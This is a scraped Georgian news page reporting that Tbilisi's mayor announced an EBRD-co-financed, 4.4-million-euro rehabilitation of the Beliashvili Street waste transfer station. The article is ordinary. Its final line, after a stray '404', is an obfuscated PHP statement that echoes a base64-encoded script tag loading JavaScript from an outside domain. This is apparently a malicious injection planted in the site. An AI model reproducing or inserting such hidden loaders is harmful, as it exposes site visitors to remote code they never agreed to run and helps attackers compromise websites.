celsiusi
ავერსი შნაიდერი

 ბელიაშვილის ქუჩაზე, ნარჩენების გადამტვირთავი სადგურის რეაბილიტაცია EBRD-ის ფინანსური დახმარებით დაიწყება. დედაქალაქის მერმა, კახა კალაძემ, დღეს გამართულ მთავრობის სხდომაზე თქვა, რომ საპროექტო და სამშენებლო ტენდერი უკვე დასრულებულია.

მერის თქმით, მოდერნიზებული სადგური გაზრდის ნარჩენების გადაზიდვის ეფექტიანობას და შეამცირებს სუნს.

"ვიწყებთ კიდევ ერთ პროექტს EBRD-ის დახმარებით, მათი თანადაფინანსებით. ეს არის, ნარჩენების გადამტვირთავი სადგურის რეაბილიტაცია ბელიაშვილის ქუჩაზე, რომელიც მოსაწესრიგებელია. შესაბამისი ხელშეკრულება თბილ სერვისჯგუფსა და ტენდერში გაფორმებულ კომპანიას შორის უკვე გაფორმებულია და ერთი წლის განმავლობაში კონტრაქტორმა კომპანიამ, უნდა შეასრულოს საპროექტო და სამშენებლო სამუშაოები. შედეგად, დედაქალაქს ექნება უსაფრთხო, მოდერნიზებული და ლოგისტიკურად უფრო გამტარი გადამტვირთავი სადგური.

აღნიშნული პროექტის ფარგლებში მოეწყობა ცილინდრული ტიპის დანადგარები, საპრესი მოწყობილობით, რაც საგრძნობლად დააჩქარებს და ოპტიმალურს გახდის პროცესს. გაზრდის ნარჩენების გადაზიდვის ეფექტიანობას და შეამცირებს სუნს, რაც ძალიან სერიოზულ პრობლემას წარმოადგენდა. ასევე, მოეწყობა მოდერნიზებული სამრეცხაო, სპეცტექნიკისთვის გათვალისწინებული პარკინგი და ყველა საჭირო ინფრასტრუქტურა. ამისთვის ბიუჯეტში გათვალისწინებულია 4.4 მლნ ევრო", - განაცხადა კალაძემ.

404
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");